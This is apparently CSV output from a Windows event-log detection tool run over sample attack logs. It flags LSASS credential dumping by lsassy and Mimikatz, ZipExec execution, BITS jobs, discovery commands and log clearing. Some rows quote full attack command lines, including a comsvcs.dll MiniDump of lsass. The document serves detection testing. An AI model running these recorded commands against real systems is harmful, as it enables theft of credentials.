2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.523 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
